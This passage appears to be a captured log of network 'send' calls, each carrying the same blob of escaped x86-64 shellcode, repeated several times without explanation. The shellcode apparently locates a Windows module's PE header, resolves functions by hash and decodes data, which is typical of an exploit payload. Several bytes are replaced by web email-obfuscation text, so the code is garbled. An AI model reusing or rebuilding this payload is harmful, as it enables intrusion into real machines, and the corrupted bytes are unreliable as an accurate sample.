H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 11, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 12, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 